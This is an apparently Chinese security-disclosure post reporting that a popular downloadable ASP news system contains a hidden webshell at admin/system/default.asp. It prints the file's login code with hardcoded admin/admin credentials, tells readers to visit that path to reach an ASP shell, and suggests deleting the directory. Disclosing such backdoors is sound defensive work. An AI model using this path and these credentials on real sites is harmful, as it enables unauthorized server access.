网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

超强图文新闻系统 v2.0疑似内置webshell - 网站安全

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 我很好奇某个源码文件用意。。。详细说明:到站长下载看到一个小系统9w多下载量:体积很小,好奇下之,这里是下载地址:http://down.chinaz.com/soft/1279.htm大致看了下,发现一个好玩的东东...

我很好奇某个源码文件用意。。。
详细说明:
到站长下载看到一个小系统9w多下载量:
 
 
体积很小,好奇下之,这里是下载地址:
http://down.chinaz.com/soft/1279.htm
大致看了下,发现一个好玩的东东,不知其用意
抛开“常规后台”/admin登录帐号口令%绕过不说,来看看位于admin\system\default.asp的代码
<%
systemname="admin"
systempass="admin"
%>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Content-Language" content="zh-cn">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>System Administrator ver 1.1</title>
<style>
body{margin:0px;scrollbar-face-color:buttonface;scrollbar-highlight-color:buttonface;scrollbar-shadow-color:buttonface;scrollbar-3dlight-color:buttonhighlight;scrollbar-arrow-color:#797979;scrollbar-track-color:#EEEEEE;scrollbar-darkshadow-color:buttonshadow}
body,a,table,div,span,td,th,input,select{font:9pt;font-family: "宋体", Verdana, Arial, Helvetica, sans-serif;}
.text{border:1 solid buttonface;background-color:buttonhighlight}
.button{height:18;border:1 ridge buttonhighlight;background-color:buttonface}
#do{background-color:ffffff;color:FF8000;text-align:center;width:8pt;height:8pt;corsur:hand}
#box{width:7pt;height:7pt;}
a{text-decoration:none;}
</style>
<body onSelectStart="event.returnValue=false;" onConTextMenu="event.returnValue=false">
<%
adminname=Request.form("adminname")
adminpass=Request.form("adminpass")
if adminname=systemname and adminpass=systempass and Session("admin")<>"come" then Session("admin")="come"
if Session("admin")="" then%>
<table border=0 cellPadding=0 cellSpacing=0 height="100%" width="100%">
  <tbody>
  <tr><td align=middle>
 
<table border="0" cellpadding="3" cellspacing="2" width="200" align="center" bgcolor="EAEAEA">
  <form name="form" method="post" action="default.asp">
  <tr><th bgcolor="AAAAAA" colspan="2">管 理 员 登 陆</td></tr>
  <tr><td>用户名</td><td><input class="text" type="text" name="adminname"></td></tr>
  <tr><td>口 令</td><td><input class="text" type="Password" name="adminpass"></td></tr>
  <tr><td></td><td align="center">
    <input class="button" type="submit" value="登 陆">
    <input class="button" type="reset" value="取 消">
  </td></tr>
  </form>
</table>.............
 
你懂的。。。。。
 
访问http://site/admin/system/default.asp
输入 admin/admin
你将看到一个标准的asp shell

 
修复方案:
去了system目录吧 要也没有。。

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论